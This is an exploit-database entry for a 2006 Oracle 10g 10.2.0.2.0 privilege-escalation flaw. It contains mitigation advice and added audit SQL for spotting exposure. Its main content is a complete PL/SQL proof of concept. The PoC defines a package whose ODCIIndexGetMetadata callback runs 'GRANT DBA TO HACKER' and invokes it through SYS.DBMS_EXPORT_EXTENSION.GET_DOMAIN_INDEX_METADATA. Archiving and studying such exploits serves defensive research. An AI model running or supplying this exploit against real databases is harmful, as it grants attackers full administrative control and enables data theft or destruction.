Vendor: Oracle Database
By: N1V1Hd $3c41r3
CVSS: 9 (HIGH)
Type: Privilege Escalation
CWE: 264
Product Name: Oracle Database
Affected Version From: 10.2.0.2.0
Affected Version To: 10.2.0.2.0
Patch Exists: YES
Related CWE: N/A
CPE: oracle:oracle_database:10.2.0.2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

Oracle 10g 10.2.0.2.0 Exploit

This exploit grants DBA privileges to the hacker by exploiting a vulnerability in the Oracle 10g 10.2.0.2.0 database. It passes the name of a hacker-owned package to the SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA function, which then executes that package's ODCIIndexGetMetadata function; the malicious code in it issues GRANT DBA TO HACKER.

Mitigation:

Oracle recommends that customers apply the latest Critical Patch Update (CPU) as it contains fixes for security vulnerabilities. Additionally, customers should apply the latest Patch Set Update (PSU) as it contains a superset of all fixes from the latest CPU.
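To check a database for exposure to the issue described above, the following audit queries can be run alongside patching. This is an added example, not part of the original advisory or of Oracle's guidance; it assumes an account that can read the DBA_* dictionary views and V$VERSION, and unwrapped PL/SQL source for the second query.

```sql
-- Added audit example (not from the original advisory).
-- Assumes read access to DBA_TAB_PRIVS, DBA_SOURCE, DBA_OBJECTS,
-- DBA_ROLE_PRIVS and V$VERSION.

-- 0. Confirm the running release; the advisory lists 10.2.0.2.0 as affected.
SELECT banner
  FROM v$version
 WHERE banner LIKE 'Oracle Database%';

-- 1. Who may execute the SYS package named in the advisory?
--    A grant to PUBLIC means every database account can call it.
SELECT grantee, privilege, grantor
  FROM dba_tab_privs
 WHERE owner      = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION'
   AND privilege  = 'EXECUTE'
 ORDER BY grantee;

-- 2. Stored code outside SYS that defines ODCIIndexGetMetadata, the
--    callback the PoC implements. Oracle-supplied index types may appear
--    here too; compare the result against a known-good baseline.
--    Wrapped (obfuscated) source will not match this text search.
SELECT s.owner, s.name, s.type, o.created, o.last_ddl_time
  FROM dba_source  s
  JOIN dba_objects o
    ON o.owner       = s.owner
   AND o.object_name = s.name
   AND o.object_type = s.type
 WHERE UPPER(s.text) LIKE '%ODCIINDEXGETMETADATA%'
   AND s.owner <> 'SYS'
 GROUP BY s.owner, s.name, s.type, o.created, o.last_ddl_time
 ORDER BY o.last_ddl_time DESC;

-- 3. Current holders of the DBA role; any grantee that is not an
--    expected administrator needs investigation.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;
```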

Exploit-DB raw data:

/* 0day, description is wrong. /str0ke */

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv)
  RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv)
  RETURN NUMBER
  IS
    pragma autonomous_transaction;
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
    COMMIT;
    RETURN(1);
  END;

END;
/

DECLARE
  INDEX_NAME VARCHAR2(200);
  INDEX_SCHEMA VARCHAR2(200);
  TYPE_NAME VARCHAR2(200);
  TYPE_SCHEMA VARCHAR2(200);
  VERSION VARCHAR2(200);
  NEWBLOCK PLS_INTEGER;
  GMFLAGS NUMBER;
  v_Return VARCHAR2(200);
BEGIN
  INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
  TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
  VERSION := '10.2.0.2.0'; GMFLAGS := 1;

  v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
    INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA,
    TYPE_NAME => TYPE_NAME, TYPE_SCHEMA => TYPE_SCHEMA,
    VERSION => VERSION, NEWBLOCK => NEWBLOCK, GMFLAGS => GMFLAGS
  );
END;
/

// milw0rm.com [2006-04-26]